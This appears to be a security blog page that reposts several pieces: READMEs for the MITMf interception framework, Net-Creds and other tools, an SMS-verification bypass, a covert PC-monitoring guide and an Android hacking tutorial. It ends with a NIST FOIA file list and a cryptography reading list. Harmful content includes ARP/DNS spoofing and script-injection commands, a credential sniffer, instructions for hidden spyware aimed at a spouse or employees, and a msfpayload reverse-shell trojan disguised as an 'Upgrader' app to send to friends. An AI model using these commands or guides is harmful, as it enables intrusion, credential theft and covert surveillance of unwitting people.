Never Ending Security


MITMf – Framework for Man-In-The-Middle attacks




Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io

This tool is based on sergio-proxy and is an attempt to revive and update the project.

Contact me at:

Before submitting issues, please read the relevant section in the wiki.

Installation

MITMf relies on a LOT of external libraries, so it is highly recommended that you use virtualenvs to install the framework; this avoids permission issues and conflicts with your system site packages (especially on Kali Linux).

Before starting the installation process:

  • On Arch Linux:
pacman -S python2-setuptools libnetfilter_queue libpcap libjpeg-turbo
  • On Debian and derivatives (e.g. Ubuntu, Kali Linux, etc.):
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev

Installing MITMf

Note: if you're rocking Arch Linux, you're awesome! Just remember to use pip2 instead of pip outside of the virtualenv.

  • Install virtualenvwrapper:
pip install virtualenvwrapper
  • Edit your .bashrc or .zshrc file to source the virtualenvwrapper.sh script:
source /usr/bin/virtualenvwrapper.sh

The location of this script may vary depending on your Linux distro

  • Restart your terminal or run:
source /usr/bin/virtualenvwrapper.sh
  • Create your virtualenv:
mkvirtualenv MITMf -p /usr/bin/python2.7
  • Clone the MITMf repository:
git clone https://github.com/byt3bl33d3r/MITMf
  • cd into the directory, then initialize and update the repo's submodules:
cd MITMf && git submodule init && git submodule update --recursive
  • Install the dependencies:
pip install -r requirements.txt
  • You’re ready to rock!
python mitmf.py --help

Description

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.

Originally built to address the significant shortcomings of other tools (e.g. Ettercap, Mallory), it's been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.

Features

  • The framework contains built-in SMB, HTTP and DNS servers that can be controlled and used by the various plugins; it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
  • As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
  • The configuration file can be edited on-the-fly while MITMf is running; the changes are passed down through the framework, allowing you to tweak plugin and server settings while performing an attack.
  • MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.
  • Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.

Active packet filtering/modification

You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)

For example, here’s a stupid little filter that just changes the destination IP address of ICMP packets:

if packet.haslayer(ICMP):
    # 'packet' is the intercepted packet as a Scapy object (see the bullets below)
    log.info('Got an ICMP packet!')
    # rewrite the destination address of every intercepted ICMP packet
    packet.dst = '192.168.1.0'
  • Use the packet variable to access the packet in a Scapy compatible format
  • Use the data variable to access the raw packet data

Now, to use the filter, all we need to do is run: python mitmf.py -F ~/filter.py

You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else ;)

Note: you can modify filters on-the-fly without restarting MITMf!
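
Here is a rough sketch of a slightly bigger filter that tampers with cleartext HTTP responses. It assumes, beyond what the bullets above document, that the Scapy layer classes (IP, TCP, Raw) are available in the filter's namespace and that MITMf re-serializes the modified packet; treat it as a starting point rather than a recipe:

if packet.haslayer(TCP) and packet.haslayer(Raw):
    payload = str(packet[Raw].load)
    if 'Server: Apache' in payload:
        log.info('Rewriting a Server header')
        # same-length replacement so TCP sequence numbers stay consistent
        packet[Raw].load = payload.replace('Apache', 'nginx/')
        # drop the checksums so Scapy recomputes them when the packet is rebuilt
        del packet[IP].chksum
        del packet[TCP].chksum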

Examples

The most basic usage starts the HTTP proxy and the SMB, DNS and HTTP servers, plus Net-Creds, on interface enp3s0:

python mitmf.py -i enp3s0

ARP poison the whole subnet with the gateway at 192.168.1.1 using the Spoof plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1

Same as above + a WPAD rogue proxy server using the Responder plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad

ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:

python mitmf.py -i enp3s0 --spoof --arp --target 192.168.1.16-45,192.168.0.1/24 --gateway 192.168.1.1

Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1

Enable LLMNR/NBTNS/MDNS spoofing:

python mitmf.py -i enp3s0 --responder --wredir --nbtns

Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dhcp

Same as above with a ShellShock payload that will be executed if any client is vulnerable:

python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Inject an HTML IFrame using the Inject plugin:

python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com

Inject a JS script:

python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js

And much much more!

Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)

For a complete list of available options, just run python mitmf.py --help

Currently available plugins

  • HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
  • SMBTrap : Exploits the ‘SMB Trap’ vulnerability on connected clients
  • ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a client's browser
  • Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
  • SSLstrip+ : Partially bypass HSTS
  • Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
  • BeEFAutorun : Autoruns BeEF modules based on a client’s OS or browser type
  • AppCachePoison : Performs HTML5 App-Cache poisoning attacks
  • Ferret-NG : Transparently hijacks client sessions
  • BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
  • FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
  • Inject : Inject arbitrary content into HTML content
  • BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
  • JSkeylogger : Injects a Javascript keylogger into a client’s webpages
  • Replace : Replace arbitrary content in HTML content
  • SMBAuth : Evoke SMB challenge-response authentication attempts
  • Upsidedownternet : Flips images 180 degrees


More information can be found on: https://github.com/byt3bl33d3r/MITMf


BlindElephant Web Application Fingerprinter





The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.
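
The core idea can be sketched in a few lines of Python. This is not BlindElephant's actual code; the probe path, the hash values and the choice of MD5 below are placeholders for illustration only:

import hashlib
import urllib2   # BlindElephant targets Python 2.6

# hypothetical table: static file path -> {hash of that file: versions shipping it}
KNOWN_HASHES = {
    '/mt-static/mt.js': {
        'placeholder-hash-for-4.22-en': ['4.22-en', '4.22-en-COM'],
        # ...one entry per known release...
    },
}

def fingerprint(base_url):
    candidates = None
    for path, table in KNOWN_HASHES.items():
        try:
            body = urllib2.urlopen(base_url + path).read()
        except urllib2.URLError:
            continue                      # probe file missing on this install; try the next one
        versions = set(table.get(hashlib.md5(body).hexdigest(), []))
        # each probed file narrows down the set of possible versions
        candidates = versions if candidates is None else candidates & versions
    return candidates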

Sourceforge Project Page: https://sourceforge.net/projects/blindelephant/
Discussion and Forums: http://www.qualys.com/blindelephant
License: LGPL

Getting Started

BlindElephant can be used directly as a tool on the command line, or as a library to provide fingerprinting functionality to another program.

Pre-requisites:

  • Python 2.6.x (prefer 2.6.5); users of earlier versions may have difficulty installing or running BlindElephant.

Get the code:

Installation:

Installation is only required if you plan to use BlindElephant as a library. Make sure that your Python installation has distutils, and then do:

cd blindelephant/src
sudo python setup.py install

(Windows users, omit sudo)

Example Usage (Command Line):

setup.py will have placed BlindElephant.py in your /usr/local/bin dir.

$ BlindElephant.py 
Usage: BlindElephant.py [options] url appName

Options:
  -h, --help            show this help message and exit
  -p PLUGINNAME, --pluginName=PLUGINNAME
                        Fingerprint version of plugin (should apply to web app
                        given in appname)
  -s, --skip            Skip fingerprinting webpp, just fingerprint plugin
  -n NUMPROBES, --numProbes=NUMPROBES
                        Number of files to fetch (more may increase accuracy).
                        Default: 15
  -w, --winnow          If more than one version are returned, use winnowing
                        to attempt to narrow it down (up to numProbes
                        additional requests).
  -l, --list            List supported webapps and plugins

Use "guess" as app or plugin name to attempt to attempt to
discover which supported apps/plugins are installed.

$ python BlindElephant.py http://laws.qualys.com movabletype
Loaded /usr/local/lib/python2.6/dist-packages/blindelephant/dbs/movabletype.pkl with 96 versions, 2229 differentiating paths, and 209 version groups.
Starting BlindElephant fingerprint for version of movabletype at http://laws.qualys.com 

Fingerprinting resulted in:
4.22-en
4.22-en-COM
4.23-en
4.23-en-COM

Best Guess: 4.23-en-COM

Example Usage (Library):

$python
>>> from blindelephant.Fingerprinters import WebAppFingerprinter
>>> 
>>> #Construct the fingerprinter
>>> #use default logger pointing to console; can pass "logger" arg to change output
>>> fp = WebAppFingerprinter("http://laws.qualys.com", "movabletype")
>>> #do the fingerprint; data becomes available as instance vars
>>> fp.fingerprint()
(same as above)
>>> print "Possible versions:", fp.ver_list
Possible versions: [LooseVersion ('4.22-en'), LooseVersion ('4.22-en-COM'), LooseVersion ('4.23-en'), LooseVersion ('4.23-en-COM')]
>>> print "Max possible version: ", fp.best_guess
Max possible version:  4.23-en-COM


More information about BlindElephant can be found on: http://blindelephant.sourceforge.net



Net-Creds – Sniffs Sensitive Data From Interface Or Pcap


Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.
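
As a rough illustration of port-independent sniffing (this is not net-creds' own code, and unlike the real tool it does not reassemble fragmented packets), a minimal Scapy sketch could look like this; the interface name is an assumption:

from scapy.all import sniff, TCP, Raw
import re

CRED_RE = re.compile(r'^(USER|PASS)\s+(\S+)', re.IGNORECASE | re.MULTILINE)

def inspect(pkt):
    # look inside every TCP payload, no matter which port the traffic uses
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        match = CRED_RE.search(pkt[Raw].load.decode('utf-8', 'replace'))
        if match:
            print('port %d: %s %s' % (pkt[TCP].dport, match.group(1), match.group(2)))

sniff(iface='eth0', prn=inspect, store=0)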


Sniffs

  • URLs visited
  • POST loads sent
  • HTTP form logins/passwords
  • HTTP basic auth logins/passwords
  • HTTP searches
  • FTP logins/passwords
  • IRC logins/passwords
  • POP logins/passwords
  • IMAP logins/passwords
  • Telnet logins/passwords
  • SMTP logins/passwords
  • SNMP community string
  • NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP, etc.)
  • Kerberos

Examples

Auto-detect the interface to sniff

sudo python net-creds.py

Choose eth0 as the interface

sudo python net-creds.py -i eth0

Ignore packets to and from 192.168.0.2

sudo python net-creds.py -f 192.168.0.2

Read from pcap

python net-creds.py -p pcapfile

OSX

Credit to epocs:

sudo easy_install pip
sudo pip install scapy
sudo pip install pcapy
brew install libdnet --with-python
mkdir -p /Users/<username>/Library/Python/2.7/lib/python/site-packages
echo 'import site; site.addsitedir("/usr/local/lib/python2.7/site-packages")' >> /Users/<username>/Library/Python/2.7/lib/python/site-packages/homebrew.pth
sudo pip install pypcap
brew tap brona/iproute2mac
brew install iproute2mac

Then replace line 74 ‘/sbin/ip’ with ‘/usr/local/bin/ip’.


More Info On: https://github.com/DanMcInerney/net-creds


Duck Hunter



Duck Hunter


Converts a USB Rubber Ducky script into a Kali Nethunter friendly format for the HID attack.

Original code and concept by @binkybear

Quack

Running Duck Hunter

duckhunter.py -l {us} input.txt output.sh

Supports multiple languages: us, fr, de, es, sv, it, uk, ru, dk, no, pt, be

Output file can be run as a regular shell file on Nethunter devices.

Keyboard Commands

Here is a list of commands that will work with your Duck Hunter input file for conversion:

DELAY 1000

In milliseconds; 1000 is equal to 1 second.

COMMAND SPACE

The Apple Command key with Space will load Spotlight.

GUI r

Windows + R key for run

WIN7CMD

Load an elevated command line in Windows 7

WIN8CMD

Load an elevated command line in Windows 8

STRING echo "I love ducks"

We pass the text we want to type with the STRING command. STRING will by default press Enter at the end of the line.

TEXT echo "I love ducky"

TEXT is similar to the STRING command, but instead of pressing ENTER after the text is typed, it leaves the text where it is. Useful if you want to type something and then combine it with other commands.

Other useful commands:

ALT
CONTROL
CTRL
DELETE
DEL
SHIFT
MENU
APP
ESCAPE
ESC
END
SPACE
TAB
PRINTSCREEN
ENTER
UP
DOWN
LEFT
RIGHT
F1-F10
CAPSLOCK

Keys can also be combined into: CTRL ALT DEL

Mouse Commands

MOUSE LEFTCLICK
MOUSE RIGHTCLICK

Left click and right click.

MOUSE 100 0

Will move the mouse 100 pixels to the right.

MOUSE 0 -50

Will move the mouse 50 pixels up.
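
Putting the keyboard and mouse commands together, a small example input file might look like the one below (the payload itself is only an illustration); convert it with duckhunter.py -l us input.txt output.sh and run the resulting output.sh on the Nethunter device:

DELAY 2000
GUI r
DELAY 500
TEXT cmd
ENTER
DELAY 1000
STRING echo quack > quack.txt
MOUSE 100 0
MOUSE LEFTCLICK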


More Info on: https://github.com/byt3bl33d3r/duckhunter


Vulnerability Scanners Simply Explained


What Is a Vulnerability Scanner?

According to Wikipedia, "A vulnerability scanner is a computer program designed to assess computers, computer systems, networks or applications for weaknesses."
As always, according to me, "A vulnerability scanner is a program designed to identify the mistakes of a system."

How Does a Vulnerability Scanner Work?

A vulnerability scanner works in much the same way an antivirus program does. These scanners first gather basic information about the host (target), such as the operating system and its version, and the open ports and services, and then select the appropriate test modules.
Vulnerability scanners have a huge database of vulnerabilities, which should be continuously updated. Scheduled scans with such a continuously updated scanner can maintain good security health in a network or system.
Vulnerability scanners not only trace vulnerabilities but sometimes also fix them, or at least suggest a fix.
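
As a toy illustration of that version-matching step (this is not how any of the scanners listed below are implemented), the following sketch grabs a service banner and looks it up in a small, hypothetical vulnerability database:

import socket

# hypothetical database: banner fingerprint -> advisory
VULN_DB = {
    'vsFTPd 2.3.4': 'backdoored release (CVE-2011-2523)',
    'OpenSSH_5.3': 'outdated; multiple known issues',
}

def check(host, port):
    s = socket.create_connection((host, port), timeout=5)
    banner = s.recv(1024).decode('ascii', 'replace').strip()
    s.close()
    for fingerprint, advisory in VULN_DB.items():
        if fingerprint in banner:
            print('%s:%d  %s -> %s' % (host, port, banner, advisory))

check('192.168.1.10', 21)   # example lab target; adjust before use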

What Are The Top Vulnerability Scanners?

  • IBM AppScan
  • Netsparker
  • Nessus
  • OpenVAS
  • Retina CS Community
  • CORE Impact Pro
  • Nexpose

What Are The Best Online Vulnerability Scanners?

  • GamaSec
  • Acunetix
  • Websecurify
  • Qualys

5 Vulnerability Scanners

1. OWASP ZAP – Zed Attack Proxy

The Zed Attack Proxy is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed for security experts as well as for developers and functional testers who are new to penetration testing. ZAP can trace out vulnerabilities automatically and manually.
So download ZAP now; it is available for Windows, Linux and Mac.
2. Burp Suite

Burp Suite is a collection of tools for web application security testing. It includes a scanner tool for discovering vulnerabilities automatically, and it also supports semi-automated penetration testing. Burp Suite helps you work faster and more effectively.
Download Burp Suite
3. OWASP Xenotix XSS Exploit Framework

OWASP Xenotix XSS Exploit Framework is an advanced Cross-Site Scripting vulnerability detection and exploitation framework. It provides zero-false-positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner.
It is claimed to have the world's second largest collection of XSS payloads, with about 1600+ distinctive payloads for effective XSS vulnerability detection and WAF bypass. The Xenotix Scripting Engine allows you to create custom test cases and add-ons over the Xenotix API. It is incorporated with a feature-rich Information Gathering module for target reconnaissance.
The Exploit Framework includes offensive XSS exploitation modules for penetration testing and proof-of-concept creation.
Download OWASP Xenotix
4. Nessus

Nessus is a powerful, free-to-use vulnerability scanner. Unlike some other scanners, the plugins (vulnerability definitions) are also free. It provides lots of features, such as:
  • Client/server can be anywhere on the network.
  • Client/server uses SSL to protect scan results.
And lots more!
5. Retina Community

Retina Community gives you powerful vulnerability management across your entire environment.
For up to 256 IPs free, Retina Community identifies network vulnerabilities (including zero-days), configuration issues, and missing patches across operating systems, applications, devices, and virtual environments.

3 Websites For Vulnerability Research


After doing some research, we have created a small list of websites that will help you perform vulnerability research. Here it is:

1. Security Tracker

 
Security Tracker provides a huge, daily-updated database to its users. It is really simple to use and effective. Anyone can search the site for the latest vulnerability information, listed under various categories. A great resource for security researchers.

2. Hackerstorm

 
Hackerstorm provides a vulnerability database tool which allows users to get almost all the information about a particular vulnerability. Hackerstorm provides daily updates for free, and the source is available for those who wish to contribute and enhance the tool. The data is provided by http://www.osvdb.org and its contributors.

3. Hackerwatch

 
Hackerwatch is not a vulnerability database, but it is a useful tool for every security researcher. It is mainly an online community where Internet users can report and share information to block and identify security threats and unwanted traffic.

How To Bypass SMS Verification Of Any Website/Service


If you don’t want to give your phone number to a website while creating an account, DON’T GIVE IT TO THEM, because today I’m going to show you a trick that you can use to bypass SMS verification of any website/service.

Bypassing SMS Verification:

  • Using Recieve-SMS-Online.info
Recieve SMS Online is a free service that allows anyone to receive SMS messages online. It has a fine list of disposable numbers from India, Romania, Germany, the USA, the United Kingdom, the Netherlands, Italy, Spain and France.
Here is how to use Recieve SMS Online to bypass SMS verification:
1. Go to the Recieve SMS Online website and browse its list of disposable numbers.
2. Select any phone number from the website, then enter that number as your mobile number in the "Phone number" box.
3. Send the verification code. (If that number is not working, skip to the next one.)
4. Click on the selected number on the website. You will be directed to its inbox.
5. You can find the verification code in the disposable inbox. Enter the code in the verification code field, then click "Verify code".
6. The account should now be verified.
There are many other free SMS receive services available online.

How To Monitor a Remote Computer For Free


Do you want to monitor a remote computer for free? If the answer is yes,….. YOU CAN DO IT! This article is full of tricks and tips that you can use to monitor a remote computer for FREE.

1. Monitor a Computer Remotely with Ammy Admin

 

Ammy Admin is a popular piece of software used for remote system administration and educational purposes. You can easily turn this innocent-looking software into a spy that allows you to see what's going on at a remote PC.

Here is how to do it:

1. Download Ammy Admin

[If the link is not working, use this MediaFire link: Download Ammy Admin]

2. Run the program on the computer you want to monitor. A window will appear.

3. Remember or write down the ID of the PC, which is shown in the green "Your ID" field. Then go to Ammy > Settings. Another window will pop up.

4. Uncheck all the checkboxes except the first one. Then click on the "Access Permissions" button. (If you want to test the video performance, use the "Video system speed test" button.) Another window will pop up.

5. Uncheck "Protect these settings from remote computer" and then click on the plus button. A small window will appear.

6. Enter a password and then confirm the password. Click on the “OK” button. Then click “OK” again to save the access permissions.

7. In the main menu, go to Ammy > Service > Install. Ammy Admin will display a message confirming that the service was successfully registered.

8. Go to Ammy > Service > Start. Then close the application. Ammy Admin will automatically run in hidden mode when Windows starts up.

9. Run Ammy Admin on the computer from which you want to monitor the remote PC.

10. Enter the ID of the remote computer in the "Client ID/IP" field. Then check the "View only" box and click on the "Connect" button.

11. Ammy Admin will display a password box.

12. Enter the password that you set up while configuring the remote PC and then click on the "OK" button.

13. Wait a few moments; it will establish a connection to the remote PC and display the live screen.

If you want to listen to what's going on at the remote PC, click the "Voice chat" button on the control panel of the remote desktop window.

You can also access files in the remote PC by using the “File Manager” button.

You can also turn your PC into a wireless remote control of the distant computer by unchecking the “View only” option.

Let's move on to technique #2.

 

2.  Monitor a Computer Remotely with ActivTrak

ActivTrak is a cloud-based monitoring service that you can use to spy on children, employees or a spouse. The company also offers paid plans, but here we are using a free account!

Let’s start!

1. Go to activtrak.com. You will see the signup page.

2. Enter your email address and then click on "Free Secure Signup". Wait a few seconds and a pop-up box will appear.

3. Enter your name, password, and organization name, and click on "OK". Then download the ActivTrak Agent (click on the "Download ActivTrak Agent" button).

4. After downloading the ActivTrak Agent.msi, install it on the remote computers you want to monitor.

5. Done! Go to your computer and then visit https://app.activtrak.com/Account/login. Log in with your email and password.

You will see the real-time activities of the remote computer.

You can also use this free account as a remote control for your distant PC, though with fewer features compared to Ammy Admin.

The limitations of the free account are limited screenshots, only 3 agents, only one user, and 3 GB of storage. But if you are ready to pay for the service, you can get features like unlimited screenshots, unlimited users, unlimited storage, a remote installer, phone support, data export and an ad-free experience.

If you have a suspicion that you are being monitored, check all the processes in the task manager and then use Detekt to scan your computer.
Also use an on-screen keyboard to enter usernames and passwords.

How To Remotely Hack Android using Kali Linux


This is a tutorial explaining how to hack Android phones with Kali Linux.
I couldn't find any tutorials explaining this hack/exploit, so I made one.
(Still, you may already know about this.)

Step 1: Fire-Up Kali:

  • Open a terminal and make a Trojan .apk file.
  • You can do this by typing:
  • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace the LHOST value with your own IP)
  • You can also hack Android over the WAN, i.e. through the Internet, by using your public/external IP as the LHOST and by port forwarding (ask me about port forwarding in the comment section if you have problems).

Step 2: Open Another Terminal:

  • Open another terminal while the file is being produced.
  • Load the Metasploit console by typing: msfconsole

Step 3: Set-Up a Listener:

  • After it loads (it will take some time), load the multi-handler exploit by typing: use exploit/multi/handler
  • Set up a (reverse) payload by typing: set payload android/meterpreter/reverse_tcp
  • To set the LHOST, type: set LHOST 192.168.0.4 (even if you are attacking over the WAN, type your private/internal IP here, not the public/external one). The full sequence is consolidated just after this list.
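
For reference, here is the whole listener setup from Steps 2 to 4 typed into one msfconsole session (same example IP as above; change it to your own):

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.4
exploit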

Step 4: Exploit!

  • At last, type exploit to start the listener.
  • Copy the application that you made (Upgrader.apk) from the root folder to your Android phone.
  • Then share it by uploading it to Dropbox or any sharing website (like www.speedyshare.com).
  • Then send the link that the website gave you to your friends and exploit their phones (only on LAN; but if you used the WAN method, then you can use the exploit anywhere on the Internet).
  • Let the victim install the Upgrader app (as he would think it is meant to upgrade some features on his phone).
  • However, the option to allow installation of apps from Unknown Sources should be enabled (if it is not already) in the security settings of the Android phone to allow the Trojan to install.
  • And when he clicks Open…

Step 5: BOOM!

There comes the meterpreter prompt:

See Meterpreter commands here:
http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics

NISTFOIA: FOIA for NIST documents related to the design of Dual EC DRBG



nistfoia


Results of a recent FOIA for NIST documents related to the design of Dual EC DRBG.

These FOIA results are the combined result of two separate requests. Thanks to the following requestors:

  • Matthew Stoller and Rep. Alan Grayson
  • Andrew Crocker and Nate Cardozo of EFF

I have contributed only OCR and hosting. Happy hunting,

Matt Green, 6/5/2014


1.15.2015 production/9.1.2 Keyless Hash Function DRBG.pdf
1.15.2015 production/ANSI X9.82 Discussions.pdf
1.15.2015 production/ANSI X9.82, Part 3 DRBGs Powers point July 20, 2004.pdf
1.15.2015 production/Appendix E_ DRBG Selection.pdf
1.15.2015 production/Comments on X9.82, Part 4_Constructions.pdf
1.15.2015 production/E1 Choosing a DRBG Algorithm.pdf
1.15.2015 production/Five DRBG Algorithms Kelsey, July 2004.pdf
1.15.2015 production/Hash Funciton chart.pdf
1.15.2015 production/Letter of transmittal 1.15.2015 .pdf
1.15.2015 production/Part 4_Constructions for Building and Validating RBG Mechanisms.pdf
1.15.2015 production/Scan_2015_01_27_13_05_55_026.pdf
1.15.2015 production/Validation Testing and NIST Statistical Test Suite July 22, 2004.pdf
1.22.2015 production/10.1.2 Hash function DRBG Using HMAC.pdf
1.22.2015 production/10.1.3 KHF_DRBG.pdf
1.22.2015 production/8.6.7 Nonce.pdf
1.22.2015 production/8.7 Prediction Resistance and Backtracking Resistance.pdf
1.22.2015 production/ANSI X9.82 Part 3 Draft July 2004.pdf
1.22.2015 production/Annex G_Informative DRBG mechanism Security Properties.pdf
1.22.2015 production/Appendix G Informative DRBG Selection.pdf
1.22.2015 production/Comments on X9.82 Part 1, Barker May 18, 2005.pdf
1.22.2015 production/Cryptographic security of Dual_EC_DRBG.pdf
1.22.2015 production/D.1 Choosing a DRBG Algorithm.pdf
1.22.2015 production/DRBG Issues Power Point July 20, 2004.pdf
1.22.2015 production/Draft X9.82 Part 3 Draft May 2005.pdf
1.22.2015 production/E.1 Choosing a DRBG Algorithm (2).pdf
1.22.2015 production/E.1 Choosing a DRBG Algorithm.pdf
1.22.2015 production/Final SP 800-90 Barker May 26, 2006.pdf
1.22.2015 production/Fwd_Final SP 800-90 Barker May 26, 2006.pdf
1.22.2015 production/Kelsey comments on SP April 12, 2006.pdf
1.22.2015 production/Latest SP 800-90 Barker May 5, 2006.pdf
1.22.2015 production/Letter of transmittal 1.22.2015.pdf
1.22.2015 production/SP 800-90 Barker June 28, 2006.pdf
1.22.2015 production/SP 800-90_pre-werb version> Barker May 9, 2006.pdf
1.22.2015 production/Terse Description of two new hash-based DRGBs Kelsey, January 2004.pdf
1.22.2015 production/Two New proposed DRBG Algorithms Kelsey January 2004.pdf
1.22.2015 production/X9.82, RGB, Issues for the Workshop.pdf
6.4.2014 production/001 – Dec 2005 -NIST Recomm Random No. Gen (Barker-Kelsey).pdf
6.4.2014 production/002 – Dec 2005 – NIST Recomm Random No. Gen (Barker-Kelsey)(2).pdf
6.4.2014 production/003 – Sept 2005 – NIST Recomm Random No. Gen (Barker-Kelsey).pdf
6.4.2014 production/004 – Jan 2004 – Terse Descr. of Two New Hash-Based DRBGs.pdf
6.4.2014 production/005 – Proposed Changes to X9.82 Pt. 3 (Slides).pdf
6.4.2014 production/006 – NIST Chart 1.pdf
6.4.2014 production/007 – RNG Standard (Under Dev. ANSI X9F1) – Barker.pdf
6.4.2014 production/008 – Random Bit Gen. Requirements.pdf
6.4.2014 production/009 – Seed File Use.pdf
6.4.2014 production/010 – NIST Chart 2.pdf
6.4.2014 production/011 – 9.12 Choosing a DRBG Algorithm.pdf
6.4.2014 production/012 – May 14 2005 – Comments on ASC X9.82 Pt. 1 – Barker.pdf
6.4.2014 production/013 – X9.82 Pt. 2 – Non-Deterministic Random Bit Generators.pdf

More info you can find on: https://github.com/matthewdgreen/nistfoia


650.445: PRACTICAL CRYPTOGRAPHIC SYSTEMS



READINGS & SUGGESTED PRESENTATION TOPICS


Protocols

  1. Crosby, Goldberg, Johnson, Song, Wagner: Cryptanalyzing HDCP (2001)

  2. Wagner, Schneier: Analysis of the SSL 3.0 Protocol

  3. Lucks, Schuler, Tews, Weinmann, Wenzel: Security of DECT

  4. Kohno: Analysis of WinZip Encryption

  5. Stubblefield, Ioannidis, Rubin: Breaking WEP

  6. Bellare, Kohno, Namprempre: Breaking and Repairing SSH

  7. Burrows, Abadi and Needham: A Logic of Authentication

  8. DTLA: DTCP Additional Localization Protocol

Side Channel Attacks

  1. Bar-el: Introduction to Side Channel Attacks (white paper)

  2. Kocher: Timing attack on RSA & DL systems

  3. Brumley, Boneh: Remote Timing Attacks are Practical

  4. Bernstein: Cache Timing Attack on AES.  Osvik, Shamir, Tromer: Attacks and Countermeasures

  5. Eisenbarth, Kasper, Moradi, Paar, Salmasizadeh, Shalmani: Attacking KeeLoq (SpringerLink)

  6. Shamir, Tromer: Acoustic Cryptanalysis

  7. Pellegrini, Bertacco, Austin: Fault-Based Attack of RSA Authentication

  8. Aciicmez, Koc, Seifert: Branch Prediction Analysis (very advanced)

Dictionary Attacks: Optimization & Mitigation

  1. Alexander: Password Protection for Modern OSes

  2. RSA Laboratories: PKCS #5 2.0: Password-Based Cryptography Standard

  3. Provos and Mazières: “Future-adaptable” password schemes

  4. Stamp: Once Upon a Time Space Tradeoff

  5. Oeschslin: Rainbow Tables (includes papers & demo)

  6. Canetti, Halevi, Steiner: Mitigating (offline) Dictionary Attacks with Reverse-Turing Tests

Securing Internet Infrastructure

  1. Jackson, Barth, Bortz, Shao, Boneh: Protecting Browsers from DNS Rebinding Attacks

  2. Kaminsky: It's the End of the (DNS) Cache As We Know It (Black Hat 2008 – 101MB)

  3. DNSSEC.net: DNS Security Extensions (standards & resources)

  4. Ptacek: A case against DNSSEC

  5. Kent, Lynn and Seo: Secure BGP

  6. BBN.com: Secure BGP resources

Digital Rights Management & Conditional Access

  1. Lawson: Designing and Attacking DRM (presentation)

  2. Edwards: A technical description of the Content Scrambling System (CSS)

  3. Henry, Sui, Zhong: Overview of AACS — and full AACS Specification

  4. ISE: A Comparison of SPDC (technology behind BD+) and AACS (2005)

  5. Craver, Wu, Liu, Stubblefield, Swartzlander, Wallach, Dean, Felten: Watermarking & SDMI

  6. Kuhn: Analysis of the Nagravision Video Scrambling Method (analog scrambling)

  7. Naor, Naor and Lotspiech: Revocation and Tracing Schemes for Stateless Receivers

Software, Physical Security, Backdoors

  1. Halderman et al.: Cold Boot Attacks on Encryption Keys & RSA Key Reconstruction

  2. Young, Yung: Cryptovirology: extortion-based security threats and countermeasures (IEEE)

  3. Dowd: Application-Specific Attacks: Leveraging the ActionScript Virtual Machine

  4. Steil: 17 Mistakes Microsoft Made in the XBox Security (2005)

  5. Bartolozzo et al.: Attacking and Fixing PKCS#11 Security Tokens

  6. Bardou et al.: Efficient Padding Oracle Attacks on Cryptographic Hardware

Privacy and Anonymity

  1. Dingledine, Mathewson, Syverson: Tor: The Second Generation Onion Router

  2. McCoy, Bauer, Grunwald, Kohno, Sicker: Analyzing Tor Usage

  3. Murdoch, Danezis: Low-cost Traffic Analysis of Tor

  4. Murdoch: Hot Or Not: Using clock skew to locate hidden services

  5. Wang, Chen, Jajodia: Tracking Anonymized VoIP Calls

Hash Functions and Random Oracles

  1. Coron, Dodis, Malinaud, Puniya: Merkle-Damgård Revisited

  2. Wang, Yu: How to break MD5 and other hash functions

  3. Stevens, Lenstra, de Weger: Target collisions for MD5

  4. Kaminsky: MD5 To Be Considered Harmful Someday

  5. Sotirov et al.: MD5 considered harmful today (building a rogue CA cert)

  6. Wang, Yin, Yu: SHA1 broken (at least, on its way…)

  7. NIST: “SHA3” competition: list of first round candidates (December 2008)

  8. Canetti, Goldreich, Halevi: Random oracles revisited, and…

  9. Bellare, Boldyreva, Palacio: A more natural uninstantiable Random-Oracle-Model scheme

